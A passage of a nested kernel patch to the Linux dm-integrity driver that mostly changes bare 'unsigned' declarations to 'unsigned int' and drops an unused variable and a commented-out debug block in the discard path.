+-	unsigned committed_section;
+-	unsigned n_committed_sections;
++	unsigned int committed_section;
++	unsigned int n_committed_sections;
+ 
+-	unsigned uncommitted_section;
+-	unsigned n_uncommitted_sections;
++	unsigned int uncommitted_section;
++	unsigned int n_uncommitted_sections;
+ 
+-	unsigned free_section;
++	unsigned int free_section;
+ 	unsigned char free_section_entry;
+-	unsigned free_sectors;
++	unsigned int free_sectors;
+ 
+-	unsigned free_sectors_threshold;
++	unsigned int free_sectors_threshold;
+ 
+ 	struct workqueue_struct *commit_wq;
+ 	struct work_struct commit_work;
+@@ -257,7 +257,7 @@ struct dm_integrity_c {
+ 
+ 	unsigned long autocommit_jiffies;
+ 	struct timer_list autocommit_timer;
+-	unsigned autocommit_msec;
++	unsigned int autocommit_msec;
+ 
+ 	wait_queue_head_t copy_to_journal_wait;
+ 
+@@ -305,7 +305,7 @@ struct dm_integrity_io {
+ 	struct dm_integrity_range range;
+ 
+ 	sector_t metadata_block;
+-	unsigned metadata_offset;
++	unsigned int metadata_offset;
+ 
+ 	atomic_t in_flight;
+ 	blk_status_t bi_status;
+@@ -329,7 +329,7 @@ struct journal_io {
+ struct bitmap_block_status {
+ 	struct work_struct work;
+ 	struct dm_integrity_c *ic;
+-	unsigned idx;
++	unsigned int idx;
+ 	unsigned long *bitmap;
+ 	struct bio_list bio_queue;
+ 	spinlock_t bio_queue_lock;
+@@ -410,8 +410,8 @@ static bool dm_integrity_disable_recalculate(struct dm_integrity_c *ic)
+ 	return false;
+ }
+ 
+-static commit_id_t dm_integrity_commit_id(struct dm_integrity_c *ic, unsigned i,
+-					  unsigned j, unsigned char seq)
++static commit_id_t dm_integrity_commit_id(struct dm_integrity_c *ic, unsigned int i,
++					  unsigned int j, unsigned char seq)
+ {
+ 	/*
+ 	 * Xor the number with section and sector, so that if a piece of
+@@ -426,7 +426,7 @@ static void get_area_and_offset(struct dm_integrity_c *ic, sector_t data_sector,
+ 	if (!ic->meta_dev) {
+ 		__u8 log2_interleave_sectors = ic->sb->log2_interleave_sectors;
+ 		*area = data_sector >> log2_interleave_sectors;
+-		*offset = (unsigned)data_sector & ((1U << log2_interleave_sectors) - 1);
++		*offset = (unsigned int)data_sector & ((1U << log2_interleave_sectors) - 1);
+ 	} else {
+ 		*area = 0;
+ 		*offset = data_sector;
+@@ -435,15 +435,15 @@ static void get_area_and_offset(struct dm_integrity_c *ic, sector_t data_sector,
+ 
+ #define sector_to_block(ic, n)						\
+ do {									\
+-	BUG_ON((n) & (unsigned)((ic)->sectors_per_block - 1));		\
++	BUG_ON((n) & (unsigned int)((ic)->sectors_per_block - 1));		\
+ 	(n) >>= (ic)->sb->log2_sectors_per_block;			\
+ } while (0)
+ 
+ static __u64 get_metadata_sector_and_offset(struct dm_integrity_c *ic, sector_t area,
+-					    sector_t offset, unsigned *metadata_offset)
++					    sector_t offset, unsigned int *metadata_offset)
+ {
+ 	__u64 ms;
+-	unsigned mo;
++	unsigned int mo;
+ 
+ 	ms = area << ic->sb->log2_interleave_sectors;
+ 	if (likely(ic->log2_metadata_run >= 0))
+@@ -484,7 +484,7 @@ static sector_t get_data_sector(struct dm_integrity_c *ic, sector_t area, sector
+ 	return result;
+ }
+ 
+-static void wraparound_section(struct dm_integrity_c *ic, unsigned *sec_ptr)
++static void wraparound_section(struct dm_integrity_c *ic, unsigned int *sec_ptr)
+ {
+ 	if (unlikely(*sec_ptr >= ic->journal_sections))
+ 		*sec_ptr -= ic->journal_sections;
+@@ -508,7 +508,7 @@ static int sb_mac(struct dm_integrity_c *ic, bool wr)
+ {
+ 	SHASH_DESC_ON_STACK(desc, ic->journal_mac);
+ 	int r;
+-	unsigned size = crypto_shash_digestsize(ic->journal_mac);
++	unsigned int size = crypto_shash_digestsize(ic->journal_mac);
+ 
+ 	if (sizeof(struct superblock) + size > 1 << SECTOR_SHIFT) {
+ 		dm_integrity_io_error(ic, "digest is too long", -EINVAL);
+@@ -704,8 +704,8 @@ repeat:
+ 
+ static void block_bitmap_copy(struct dm_integrity_c *ic, struct page_list *dst, struct page_list *src)
+ {
+-	unsigned n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
+-	unsigned i;
++	unsigned int n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
++	unsigned int i;
+ 
+ 	for (i = 0; i < n_bitmap_pages; i++) {
+ 		unsigned long *dst_data = lowmem_page_address(dst[i].page);
+@@ -716,18 +716,18 @@ static void block_bitmap_copy(struct dm_integrity_c *ic, struct page_list *dst,
+ 
+ static struct bitmap_block_status *sector_to_bitmap_block(struct dm_integrity_c *ic, sector_t sector)
+ {
+-	unsigned bit = sector >> (ic->sb->log2_sectors_per_block + ic->log2_blocks_per_bitmap_bit);
+-	unsigned bitmap_block = bit / (BITMAP_BLOCK_SIZE * 8);
++	unsigned int bit = sector >> (ic->sb->log2_sectors_per_block + ic->log2_blocks_per_bitmap_bit);
++	unsigned int bitmap_block = bit / (BITMAP_BLOCK_SIZE * 8);
+ 
+ 	BUG_ON(bitmap_block >= ic->n_bitmap_blocks);
+ 	return &ic->bbs[bitmap_block];
+ }
+ 
+-static void access_journal_check(struct dm_integrity_c *ic, unsigned section, unsigned offset,
++static void access_journal_check(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
+ 				 bool e, const char *function)
+ {
+ #if defined(CONFIG_DM_DEBUG) || defined(INTERNAL_VERIFY)
+-	unsigned limit = e ? ic->journal_section_entries : ic->journal_section_sectors;
++	unsigned int limit = e ? ic->journal_section_entries : ic->journal_section_sectors;
+ 
+ 	if (unlikely(section >= ic->journal_sections) ||
+ 	    unlikely(offset >= limit)) {
+@@ -738,10 +738,10 @@ static void access_journal_check(struct dm_integrity_c *ic, unsigned section, un
+ #endif
+ }
+ 
+-static void page_list_location(struct dm_integrity_c *ic, unsigned section, unsigned offset,
+-			       unsigned *pl_index, unsigned *pl_offset)
++static void page_list_location(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
++			       unsigned int *pl_index, unsigned int *pl_offset)
+ {
+-	unsigned sector;
++	unsigned int sector;
+ 
+ 	access_journal_check(ic, section, offset, false, "page_list_location");
+ 
+@@ -752,9 +752,9 @@ static void page_list_location(struct dm_integrity_c *ic, unsigned section, unsi
+ }
+ 
+ static struct journal_sector *access_page_list(struct dm_integrity_c *ic, struct page_list *pl,
+-					       unsigned section, unsigned offset, unsigned *n_sectors)
++					       unsigned int section, unsigned int offset, unsigned int *n_sectors)
+ {
+-	unsigned pl_index, pl_offset;
++	unsigned int pl_index, pl_offset;
+ 	char *va;
+ 
+ 	page_list_location(ic, section, offset, &pl_index, &pl_offset);
+@@ -767,14 +767,14 @@ static struct journal_sector *access_page_list(struct dm_integrity_c *ic, struct
+ 	return (struct journal_sector *)(va + pl_offset);
+ }
+ 
+-static struct journal_sector *access_journal(struct dm_integrity_c *ic, unsigned section, unsigned offset)
++static struct journal_sector *access_journal(struct dm_integrity_c *ic, unsigned int section, unsigned int offset)
+ {
+ 	return access_page_list(ic, ic->journal, section, offset, NULL);
+ }
+ 
+-static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, unsigned section, unsigned n)
++static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, unsigned int section, unsigned int n)
+ {
+-	unsigned rel_sector, offset;
++	unsigned int rel_sector, offset;
+ 	struct journal_sector *js;
+ 
+ 	access_journal_check(ic, section, n, true, "access_journal_entry");
+@@ -786,7 +786,7 @@ static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, uns
+ 	return (struct journal_entry *)((char *)js + offset * ic->journal_entry_size);
+ }
+ 
+-static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, unsigned section, unsigned n)
++static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, unsigned int section, unsigned int n)
+ {
+ 	n <<= ic->sb->log2_sectors_per_block;
+ 
+@@ -797,11 +797,11 @@ static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, uns
+ 	return access_journal(ic, section, n);
+ }
+ 
+-static void section_mac(struct dm_integrity_c *ic, unsigned section, __u8 result[JOURNAL_MAC_SIZE])
++static void section_mac(struct dm_integrity_c *ic, unsigned int section, __u8 result[JOURNAL_MAC_SIZE])
+ {
+ 	SHASH_DESC_ON_STACK(desc, ic->journal_mac);
+ 	int r;
+-	unsigned j, size;
++	unsigned int j, size;
+ 
+ 	desc->tfm = ic->journal_mac;
+ 
+@@ -866,10 +866,10 @@ err:
+ 	memset(result, 0, JOURNAL_MAC_SIZE);
+ }
+ 
+-static void rw_section_mac(struct dm_integrity_c *ic, unsigned section, bool wr)
++static void rw_section_mac(struct dm_integrity_c *ic, unsigned int section, bool wr)
+ {
+ 	__u8 result[JOURNAL_MAC_SIZE];
+-	unsigned j;
++	unsigned int j;
+ 
+ 	if (!ic->journal_mac)
+ 		return;
+@@ -898,12 +898,12 @@ static void complete_journal_op(void *context)
+ 		complete(&comp->comp);
+ }
+ 
+-static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			unsigned n_sections, struct journal_completion *comp)
++static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	struct async_submit_ctl submit;
+ 	size_t n_bytes = (size_t)(n_sections * ic->journal_section_sectors) << SECTOR_SHIFT;
+-	unsigned pl_index, pl_offset, section_index;
++	unsigned int pl_index, pl_offset, section_index;
+ 	struct page_list *source_pl, *target_pl;
+ 
+ 	if (likely(encrypt)) {
+@@ -928,7 +928,7 @@ static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sectio
+ 		struct page *dst_page;
+ 
+ 		while (unlikely(pl_index == section_index)) {
+-			unsigned dummy;
++			unsigned int dummy;
+ 			if (likely(encrypt))
+ 				rw_section_mac(ic, section, true);
+ 			section++;
+@@ -990,8 +990,8 @@ static bool do_crypt(bool encrypt, struct skcipher_request *req, struct journal_
+ 	return false;
+ }
+ 
+-static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			  unsigned n_sections, struct journal_completion *comp)
++static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			  unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	struct scatterlist **source_sg;
+ 	struct scatterlist **target_sg;
+@@ -1008,7 +1008,7 @@ static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sect
+ 
+ 	do {
+ 		struct skcipher_request *req;
+-		unsigned ivsize;
++		unsigned int ivsize;
+ 		char *iv;
+ 
+ 		if (likely(encrypt))
+@@ -1034,8 +1034,8 @@ static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sect
+ 	complete_journal_op(comp);
+ }
+ 
+-static void encrypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			    unsigned n_sections, struct journal_completion *comp)
++static void encrypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			    unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	if (ic->journal_xor)
+ 		return xor_journal(ic, encrypt, section, n_sections, comp);
+@@ -1052,12 +1052,12 @@ static void complete_journal_io(unsigned long error, void *context)
+ }
+ 
+ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+-			       unsigned sector, unsigned n_sectors,
++			       unsigned int sector, unsigned int n_sectors,
+ 			       struct journal_completion *comp)
+ {
+ 	struct dm_io_request io_req;
+ 	struct dm_io_region io_loc;
+-	unsigned pl_index, pl_offset;
++	unsigned int pl_index, pl_offset;
+ 	int r;
+ 
+ 	if (unlikely(dm_integrity_failed(ic))) {
+@@ -1099,10 +1099,10 @@ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+ }
+ 
+ static void rw_journal(struct dm_integrity_c *ic, blk_opf_t opf,
+-		       unsigned section, unsigned n_sections,
++		       unsigned int section, unsigned int n_sections,
+ 		       struct journal_completion *comp)
+ {
+-	unsigned sector, n_sectors;
++	unsigned int sector, n_sectors;
+ 
+ 	sector = section * ic->journal_section_sectors;
+ 	n_sectors = n_sections * ic->journal_section_sectors;
+@@ -1110,12 +1110,12 @@ static void rw_journal(struct dm_integrity_c *ic, blk_opf_t opf,
+ 	rw_journal_sectors(ic, opf, sector, n_sectors, comp);
+ }
+ 
+-static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsigned commit_sections)
++static void write_journal(struct dm_integrity_c *ic, unsigned int commit_start, unsigned int commit_sections)
+ {
+ 	struct journal_completion io_comp;
+ 	struct journal_completion crypt_comp_1;
+ 	struct journal_completion crypt_comp_2;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	io_comp.ic = ic;
+ 	init_completion(&io_comp.comp);
+@@ -1135,7 +1135,7 @@ static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsi
+ 		rw_journal(ic, REQ_OP_WRITE | REQ_FUA | REQ_SYNC, commit_start,
+ 			   commit_sections, &io_comp);
+ 	} else {
+-		unsigned to_end;
++		unsigned int to_end;
+ 		io_comp.in_flight = (atomic_t)ATOMIC_INIT(2);
+ 		to_end = ic->journal_sections - commit_start;
+ 		if (ic->journal_io) {
+@@ -1172,15 +1172,15 @@ static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsi
+ 	wait_for_completion_io(&io_comp.comp);
+ }
+ 
+-static void copy_from_journal(struct dm_integrity_c *ic, unsigned section, unsigned offset,
+-			      unsigned n_sectors, sector_t target, io_notify_fn fn, void *data)
++static void copy_from_journal(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
++			      unsigned int n_sectors, sector_t target, io_notify_fn fn, void *data)
+ {
+ 	struct dm_io_request io_req;
+ 	struct dm_io_region io_loc;
+ 	int r;
+-	unsigned sector, pl_index, pl_offset;
++	unsigned int sector, pl_index, pl_offset;
+ 
+-	BUG_ON((target | n_sectors | offset) & (unsigned)(ic->sectors_per_block - 1));
++	BUG_ON((target | n_sectors | offset) & (unsigned int)(ic->sectors_per_block - 1));
+ 
+ 	if (unlikely(dm_integrity_failed(ic))) {
+ 		fn(-1UL, data);
+@@ -1221,7 +1221,7 @@ static bool add_new_range(struct dm_integrity_c *ic, struct dm_integrity_range *
+ 	struct rb_node **n = &ic->in_progress.rb_node;
+ 	struct rb_node *parent;
+ 
+-	BUG_ON((new_range->logical_sector | new_range->n_sectors) & (unsigned)(ic->sectors_per_block - 1));
++	BUG_ON((new_range->logical_sector | new_range->n_sectors) & (unsigned int)(ic->sectors_per_block - 1));
+ 
+ 	if (likely(check_waiting)) {
+ 		struct dm_integrity_range *range;
+@@ -1339,10 +1339,10 @@ static void remove_journal_node(struct dm_integrity_c *ic, struct journal_node *
+ 
+ #define NOT_FOUND	(-1U)
+ 
+-static unsigned find_journal_node(struct dm_integrity_c *ic, sector_t sector, sector_t *next_sector)
++static unsigned int find_journal_node(struct dm_integrity_c *ic, sector_t sector, sector_t *next_sector)
+ {
+ 	struct rb_node *n = ic->journal_tree_root.rb_node;
+-	unsigned found = NOT_FOUND;
++	unsigned int found = NOT_FOUND;
+ 	*next_sector = (sector_t)-1;
+ 	while (n) {
+ 		struct journal_node *j = container_of(n, struct journal_node, node);
+@@ -1360,7 +1360,7 @@ static unsigned find_journal_node(struct dm_integrity_c *ic, sector_t sector, se
+ 	return found;
+ }
+ 
+-static bool test_journal_node(struct dm_integrity_c *ic, unsigned pos, sector_t sector)
++static bool test_journal_node(struct dm_integrity_c *ic, unsigned int pos, sector_t sector)
+ {
+ 	struct journal_node *node, *next_node;
+ 	struct rb_node *next;
+@@ -1385,7 +1385,7 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ {
+ 	struct rb_node *next;
+ 	struct journal_node *next_node;
+-	unsigned next_section;
++	unsigned int next_section;
+ 
+ 	BUG_ON(RB_EMPTY_NODE(&node->node));
+ 
+@@ -1398,7 +1398,7 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ 	if (next_node->sector != node->sector)
+ 		return false;
+ 
+-	next_section = (unsigned)(next_node - ic->journal_tree) / ic->journal_section_entries;
++	next_section = (unsigned int)(next_node - ic->journal_tree) / ic->journal_section_entries;
+ 	if (next_section >= ic->committed_section &&
+ 	    next_section < ic->committed_section + ic->n_committed_sections)
+ 		return true;
+@@ -1413,17 +1413,17 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ #define TAG_CMP		2
+ 
+ static int dm_integrity_rw_tag(struct dm_integrity_c *ic, unsigned char *tag, sector_t *metadata_block,
+-			       unsigned *metadata_offset, unsigned total_size, int op)
++			       unsigned int *metadata_offset, unsigned int total_size, int op)
+ {
+ #define MAY_BE_FILLER		1
+ #define MAY_BE_HASH		2
+-	unsigned hash_offset = 0;
+-	unsigned may_be = MAY_BE_HASH | (ic->discard ? MAY_BE_FILLER : 0);
++	unsigned int hash_offset = 0;
++	unsigned int may_be = MAY_BE_HASH | (ic->discard ? MAY_BE_FILLER : 0);
+ 
+ 	do {
+ 		unsigned char *data, *dp;
+ 		struct dm_buffer *b;
+-		unsigned to_copy;
++		unsigned int to_copy;
+ 		int r;
+ 
+ 		r = dm_integrity_failed(ic);
+@@ -1453,7 +1453,7 @@ static int dm_integrity_rw_tag(struct dm_integrity_c *ic, unsigned char *tag, se
+ 						goto thorough_test;
+ 				}
+ 			} else {
+-				unsigned i, ts;
++				unsigned int i, ts;
+ thorough_test:
+ 				ts = total_size;
+ 
+@@ -1652,7 +1652,7 @@ static void integrity_sector_checksum(struct dm_integrity_c *ic, sector_t sector
+ 	__le64 sector_le = cpu_to_le64(sector);
+ 	SHASH_DESC_ON_STACK(req, ic->internal_hash);
+ 	int r;
+-	unsigned digest_size;
++	unsigned int digest_size;
+ 
+ 	req->tfm = ic->internal_hash;
+ 
+@@ -1709,13 +1709,13 @@ static void integrity_metadata(struct work_struct *w)
+ 	if (ic->internal_hash) {
+ 		struct bvec_iter iter;
+ 		struct bio_vec bv;
+-		unsigned digest_size = crypto_shash_digestsize(ic->internal_hash);
++		unsigned int digest_size = crypto_shash_digestsize(ic->internal_hash);
+ 		struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+ 		char *checksums;
+-		unsigned extra_space = unlikely(digest_size > ic->tag_size) ? digest_size - ic->tag_size : 0;
++		unsigned int extra_space = unlikely(digest_size > ic->tag_size) ? digest_size - ic->tag_size : 0;
+ 		char checksums_onstack[max((size_t)HASH_MAX_DIGESTSIZE, MAX_TAG_SIZE)];
+ 		sector_t sector;
+-		unsigned sectors_to_process;
++		unsigned int sectors_to_process;
+ 
+ 		if (unlikely(ic->mode == 'R'))
+ 			goto skip_io;
+@@ -1735,14 +1735,13 @@ static void integrity_metadata(struct work_struct *w)
+ 		}
+ 
+ 		if (unlikely(dio->op == REQ_OP_DISCARD)) {
+-			sector_t bi_sector = dio->bio_details.bi_iter.bi_sector;
+-			unsigned bi_size = dio->bio_details.bi_iter.bi_size;
+-			unsigned max_size = likely(checksums != checksums_onstack) ? PAGE_SIZE : HASH_MAX_DIGESTSIZE;
+-			unsigned max_blocks = max_size / ic->tag_size;
++			unsigned int bi_size = dio->bio_details.bi_iter.bi_size;
++			unsigned int max_size = likely(checksums != checksums_onstack) ? PAGE_SIZE : HASH_MAX_DIGESTSIZE;
++			unsigned int max_blocks = max_size / ic->tag_size;
+ 			memset(checksums, DISCARD_FILLER, max_size);
+ 
+ 			while (bi_size) {
+-				unsigned this_step_blocks = bi_size >> (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
++				unsigned int this_step_blocks = bi_size >> (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
+ 				this_step_blocks = min(this_step_blocks, max_blocks);
+ 				r = dm_integrity_rw_tag(ic, checksums, &dio->metadata_block, &dio->metadata_offset,
+ 							this_step_blocks * ic->tag_size, TAG_WRITE);
+@@ -1752,13 +1751,7 @@ static void integrity_metadata(struct work_struct *w)
+ 					goto error;
+ 				}
+ 
+-				/*if (bi_size < this_step_blocks << (SECTOR_SHIFT + ic->sb->log2_sectors_per_block)) {
+-					printk("BUGG: bi_sector: %llx, bi_size: %u\n", bi_sector, bi_size);
+-					printk("BUGG: this_step_blocks: %u\n", this_step_blocks);
+-					BUG();
+-				}*/
+ 				bi_size -= this_step_blocks << (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
+-				bi_sector += this_step_blocks << ic->sb->log2_sectors_per_block;
+ 			}
+ 
+ 			if (likely(checksums != checksums_onstack))
+@@ -1770,7 +1763,7 @@ static void integrity_metadata(struct work_struct *w)
+ 		sectors_to_process = dio->range.n_sectors;
+ 
+ 		__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
+-			unsigned pos;
++			unsigned int pos;
+ 			char *mem, *checksums_ptr;
+ 
+ again:
+@@ -1823,13 +1816,13 @@ again:
+ 		if (bip) {
+ 			struct bio_vec biv;
+ 			struct bvec_iter iter;
+-			unsigned data_to_process = dio->range.n_sectors;
++			unsigned int data_to_process = dio->range.n_sectors;
+ 			sector_to_block(ic, data_to_process);
+ 			data_to_process *= ic->tag_size;
+ 
+ 			bip_for_each_vec(biv, bip, iter) {
+ 				unsigned char *tag;
+-				unsigned this_len;
++				unsigned int this_len;
+ 
+ 				BUG_ON(PageHighMem(biv.bv_page));
+ 				tag = bvec_virt(&biv);
+@@ -1867,7 +1860,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 	if (unlikely(dio->op == REQ_OP_DISCARD)) {
+ 		if (ti->max_io_len) {
+ 			sector_t sec = dm_target_offset(ti, bio->bi_iter.bi_sector);
+-			unsigned log2_max_io_len = __fls(ti->max_io_len);
++			unsigned int log2_max_io_len = __fls(ti->max_io_len);
+ 			sector_t start_boundary = sec >> log2_max_io_len;
+ 			sector_t end_boundary = (sec + bio_sectors(bio) - 1) >> log2_max_io_len;
+ 			if (start_boundary < end_boundary) {
+@@ -1897,7 +1890,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 		      ic->provided_data_sectors);
+ 		return DM_MAPIO_KILL;
+ 	}
+-	if (unlikely((dio->range.logical_sector | bio_sectors(bio)) & (unsigned)(ic->sectors_per_block - 1))) {
++	if (unlikely((dio->range.logical_sector | bio_sectors(bio)) & (unsigned int)(ic->sectors_per_block - 1))) {
+ 		DMERR("Bio not aligned on %u sectors: 0x%llx, 0x%x",
+ 		      ic->sectors_per_block,
+ 		      dio->range.logical_sector, bio_sectors(bio));
+@@ -1919,7 +1912,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 	bip = bio_integrity(bio);
+ 	if (!ic->internal_hash) {
+ 		if (bip) {
+-			unsigned wanted_tag_size = bio_sectors(bio) >> ic->sb->log2_sectors_per_block;
++			unsigned int wanted_tag_size = bio_sectors(bio) >> ic->sb->log2_sectors_per_block;
+ 			if (ic->log2_tag_size >= 0)
+ 				wanted_tag_size <<= ic->log2_tag_size;
+ 			else
+@@ -1949,11 +1942,11 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static bool __journal_read_write(struct dm_integrity_io *dio, struct bio *bio,
+-				 unsigned journal_section, unsigned journal_entry)
++				 unsigned int journal_section, unsigned int journal_entry)
+ {
+ 	struct dm_integrity_c *ic = dio->ic;
+ 	sector_t logical_sector;
+-	unsigned n_sectors;
++	unsigned int n_sectors;
+ 
+ 	logical_sector = dio->range.logical_sector;
+ 	n_sectors = dio->range.n_sectors;
+@@ -1976,7 +1969,7 @@ retry_kmap:
+ 			if (unlikely(dio->op == REQ_OP_READ)) {
+ 				struct journal_sector *js;
+ 				char *mem_ptr;
+-				unsigned s;
++				unsigned int s;
+ 
+ 				if (unlikely(journal_entry_is_inprogress(je))) {
+ 					flush_dcache_page(bv.bv_page);
+@@ -2013,12 +2006,12 @@ retry_kmap:
+ 
+ 			if (!ic->internal_hash) {
+ 				struct bio_integrity_payload *bip = bio_integrity(bio);
+-				unsigned tag_todo = ic->tag_size;
++				unsigned int tag_todo = ic->tag_size;
+ 				char *tag_ptr = journal_entry_tag(ic, je);
+ 
+ 				if (bip) do {
+ 					struct bio_vec biv = bvec_iter_bvec(bip->bip_vec, bip->bip_iter);
+-					unsigned tag_now = min(biv.bv_len, tag_todo);
++					unsigned int tag_now = min(biv.bv_len, tag_todo);
+ 					char *tag_addr;
+ 					BUG_ON(PageHighMem(biv.bv_page));
+ 					tag_addr = bvec_virt(&biv);
+@@ -2037,7 +2030,7 @@ retry_kmap:
+ 
+ 			if (likely(dio->op == REQ_OP_WRITE)) {
+ 				struct journal_sector *js;
+-				unsigned s;
++				unsigned int s;
+ 
+ 				js = access_journal_data(ic, journal_section, journal_entry);
+ 				memcpy(js, mem + bv.bv_offset, ic->sectors_per_block << SECTOR_SHIFT);
+@@ -2048,7 +2041,7 @@ retry_kmap:
+ 				} while (++s < ic->sectors_per_block);
+ 
+ 				if (ic->internal_hash) {
+-					unsigned digest_size = crypto_shash_digestsize(ic->internal_hash);
++					unsigned int digest_size = crypto_shash_digestsize(ic->internal_hash);
+ 					if (unlikely(digest_size > ic->tag_size)) {
+ 						char checksums_onstack[HASH_MAX_DIGESTSIZE];
+ 						integrity_sector_checksum(ic, logical_sector, (char *)js, checksums_onstack);
+@@ -2105,8 +2098,8 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ {
+ 	struct dm_integrity_c *ic = dio->ic;
+ 	struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+-	unsigned journal_section, journal_entry;
+-	unsigned journal_read_pos;
++	unsigned int journal_section, journal_entry;
++	unsigned int journal_read_pos;
+ 	struct completion read_comp;
+ 	bool discard_retried = false;
+ 	bool need_sync_io = ic->internal_hash && dio->op == REQ_OP_READ;
+@@ -2131,8 +2124,8 @@ retry:
+ 	journal_read_pos = NOT_FOUND;
+ 	if (ic->mode == 'J' && likely(dio->op != REQ_OP_DISCARD)) {
+ 		if (dio->op == REQ_OP_WRITE) {
+-			unsigned next_entry, i, pos;
+-			unsigned ws, we, range_sectors;
++			unsigned int next_entry, i, pos;
++			unsigned int ws, we, range_sectors;
+ 
+ 			dio->range.n_sectors = min(dio->range.n_sectors,
+ 						   (sector_t)ic->free_sectors << ic->sb->log2_sectors_per_block);
+@@ -2185,8 +2178,8 @@ retry:
+ 				if (unlikely(dio->range.n_sectors > next_sector - dio->range.logical_sector))
+ 					dio->range.n_sectors = next_sector - dio->range.logical_sector;
+ 			} else {
+-				unsigned i;
+-				unsigned jp = journal_read_pos + 1;
++				unsigned int i;
++				unsigned int jp = journal_read_pos + 1;
+ 				for (i = ic->sectors_per_block; i < dio->range.n_sectors; i += ic->sectors_per_block, jp++) {
+ 					if (!test_journal_node(ic, jp, dio->range.logical_sector + i))
+ 						break;
+@@ -2218,7 +2211,7 @@ offload_to_thread:
+ 		 */
+ 		if (journal_read_pos != NOT_FOUND) {
+ 			sector_t next_sector;
+-			unsigned new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
++			unsigned int new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
+ 			if (unlikely(new_pos != journal_read_pos)) {
+ 				remove_range_unlocked(ic, &dio->range);
+ 				goto retry;
+@@ -2227,7 +2220,7 @@ offload_to_thread:
+ 	}
+ 	if (ic->mode == 'J' && likely(dio->op == REQ_OP_DISCARD) && !discard_retried) {
+ 		sector_t next_sector;
+-		unsigned new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
++		unsigned int new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
+ 		if (unlikely(new_pos != NOT_FOUND) ||
+ 		    unlikely(next_sector < dio->range.logical_sector - dio->range.n_sectors)) {
+ 			remove_range_unlocked(ic, &dio->range);
+@@ -2354,8 +2347,8 @@ static void pad_uncommitted(struct dm_integrity_c *ic)
+ static void integrity_commit(struct work_struct *w)
+ {
+ 	struct dm_integrity_c *ic = container_of(w, struct dm_integrity_c, commit_work);
+-	unsigned commit_start, commit_sections;
+-	unsigned i, j, n;
++	unsigned int commit_start, commit_sections;
++	unsigned int i, j, n;
+ 	struct bio *flushes;
+ 
+ 	del_timer(&ic->autocommit_timer);
+@@ -2433,17 +2426,17 @@ static void complete_copy_from_journal(unsigned long error, void *context)
+ static void restore_last_bytes(struct dm_integrity_c *ic, struct journal_sector *js,
+ 			       struct journal_entry *je)
+ {
+-	unsigned s = 0;
++	unsigned int s = 0;
+ 	do {
+ 		js->commit_id = je->last_bytes[s];
+ 		js++;
+ 	} while (++s < ic->sectors_per_block);
+ }
+ 
+-static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+-			     unsigned write_sections, bool from_replay)
++static void do_journal_write(struct dm_integrity_c *ic, unsigned int write_start,
++			     unsigned int write_sections, bool from_replay)
+ {
+-	unsigned i, j, n;
++	unsigned int i, j, n;
+ 	struct journal_completion comp;
+ 	struct blk_plug plug;
+ 
+@@ -2462,9 +2455,9 @@ static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+ 		for (j = 0; j < ic->journal_section_entries; j++) {
+ 			struct journal_entry *je = access_journal_entry(ic, i, j);
+ 			sector_t sec, area, offset;
+-			unsigned k, l, next_loop;
++			unsigned int k, l, next_loop;
+ 			sector_t metadata_block;
+-			unsigned metadata_offset;
++			unsigned int metadata_offset;
+ 			struct journal_io *io;
+ 
+ 			if (journal_entry_is_unused(je))
+@@ -2472,7 +2465,7 @@ static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+ 			BUG_ON(unlikely(journal_entry_is_inprogress(je)) && !from_replay);
+ 			sec = journal_entry_get_sector(je);
